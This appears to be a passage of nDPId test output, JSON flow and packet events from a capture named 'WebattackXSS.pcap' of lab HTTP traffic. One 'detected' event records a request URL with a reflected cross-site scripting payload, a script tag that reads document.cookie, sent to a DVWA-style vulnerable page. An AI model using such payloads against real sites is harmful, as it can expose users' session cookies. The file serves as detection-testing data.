-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347948293,"flow_last_seen":1499347953886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34372,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347948293,"flow_last_seen":1499347953886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34372,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347949587,"flow_last_seen":1499347954886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34386,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347949587,"flow_last_seen":1499347954886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347952161,"flow_last_seen":1499347957887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34412,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347952161,"flow_last_seen":1499347957887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34412,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347953439,"flow_last_seen":1499347958887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34426,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347953439,"flow_last_seen":1499347958887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34426,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347954738,"flow_last_seen":1499347959887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34440,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347954738,"flow_last_seen":1499347959887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347945720,"flow_last_seen":1499347950886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34346,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347945720,"flow_last_seen":1499347950886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9152,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348072088,"flow_last_seen":1499348072088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348072088,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35668,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9152,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":1,"flow_last_seen":1499348072088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348072088,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DYZAAD4GuEqsEAABwKgKMotUAFAOsRP1AAAAAKACchCRCQAAAgQFtAQCCAoBPR5zAAAAAAEDAwc="} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9153,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":2,"flow_last_seen":1499348072088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348072088,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi1Q00\/Q8DrET9qAScSB1CgAAAgQFtAQCCAoD5u\/nAT0ecwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":3,"flow_last_seen":1499348072089,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348072089,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DYdAAD4GuFGsEAABwKgKMotUAFAOsRP2NNP0PYAQAOUUEgAAAQEICgE9HnMD5u\/n"} -01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9155,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348068136,"flow_last_seen":1499348072090,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499348072090,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35626,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27KGE8ES9SCQ7FORY5VSPTYY4R4UHJNRQTPTAY6L9JR1OU40RPDA%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348073365,"flow_last_seen":1499348073365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348073365,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35682,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":1,"flow_last_seen":1499348073365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348073365,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Pg1AAD4Gh8OsEAABwKgKMotiAFCjeCG\/AAAAAKACchDtKgAAAgQFtAQCCAoBPR+yAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9163,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":2,"flow_last_seen":1499348073365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348073365,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi2IT1M33o3ghwKAScSAXMQAAAgQFtAQCCAoD5vEmAT0fsgEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9164,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":3,"flow_last_seen":1499348073366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348073366,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Pg5AAD4Gh8qsEAABwKgKMotiAFCjeCHAE9TN+IAQAOW2NwAAAQEICgE9H7MD5vEm"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348074670,"flow_last_seen":1499348074670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348074670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_packet_id":1,"flow_last_seen":1499348074670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348074670,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OC5AAD4GjaKsEAABwKgKMotwAFDSMxjXAAAAAKACchDGAgAAAgQFtAQCCAoBPSD5AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9172,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_packet_id":2,"flow_last_seen":1499348074670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348074670,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi3D0f4w30jMY2KAScSBP1gAAAgQFtAQCCAoD5vJtAT0g+QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9173,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_packet_id":3,"flow_last_seen":1499348074671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348074671,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OC9AAD4GjamsEAABwKgKMotwAFDSMxjY9H+MOIAQAOXu3QAAAQEICgE9IPkD5vJt"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348077218,"flow_last_seen":1499348077218,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348077218,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35722,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_packet_id":1,"flow_last_seen":1499348077218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348077218,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80HtAAD4G9VSsEAABwKgKMouKAFBc0\/MNAAAAAKACchBelQAAAgQFtAQCCAoBPSN2AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9193,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_packet_id":2,"flow_last_seen":1499348077218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348077218,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi4oOSV5eXNPzDqAScSD5+wAAAgQFtAQCCAoD5vTqAT0jdgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_packet_id":3,"flow_last_seen":1499348077219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348077219,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00HxAAD4G9VusEAABwKgKMouKAFBc0\/MODkleX4AQAOWZAwAAAQEICgE9I3YD5vTq"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348078531,"flow_last_seen":1499348078531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348078531,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35736,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_packet_id":1,"flow_last_seen":1499348078531,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348078531,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86yNAAD4G2qysEAABwKgKMouYAFAizM+dAAAAAKACchC6tgAAAgQFtAQCCAoBPSS+AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9205,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_packet_id":2,"flow_last_seen":1499348078532,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348078532,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi5glYndPIszPnqAScSAkywAAAgQFtAQCCAoD5vYyAT0kvgEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9206,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_packet_id":3,"flow_last_seen":1499348078532,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348078532,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06yRAAD4G2rOsEAABwKgKMouYAFAizM+eJWJ3UIAQAOXD0gAAAQEICgE9JL4D5vYy"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9225,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348081113,"flow_last_seen":1499348081113,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081113,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35762,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9225,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":1,"flow_last_seen":1499348081113,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348081113,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8P1ZAAD4GhnqsEAABwKgKMouyAFAGWhgVAAAAAKACchCMEgAAAgQFtAQCCAoBPSdDAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9226,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":2,"flow_last_seen":1499348081113,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348081113,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi7IGSc2TBloYFqAScSC8dgAAAgQFtAQCCAoD5vi3AT0nQwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9227,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":3,"flow_last_seen":1499348081114,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348081114,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0P1dAAD4GhoGsEAABwKgKMouyAFAGWhgWBknNlIAQAOVbfQAAAQEICgE9J0QD5vi3"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347957282,"flow_last_seen":1499347962887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34466,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347957282,"flow_last_seen":1499347962887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347958588,"flow_last_seen":1499347963888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34480,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347958588,"flow_last_seen":1499347963888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347961167,"flow_last_seen":1499347966888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34506,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347961167,"flow_last_seen":1499347966888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34506,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347962480,"flow_last_seen":1499347967888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34520,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347962480,"flow_last_seen":1499347967888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34520,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 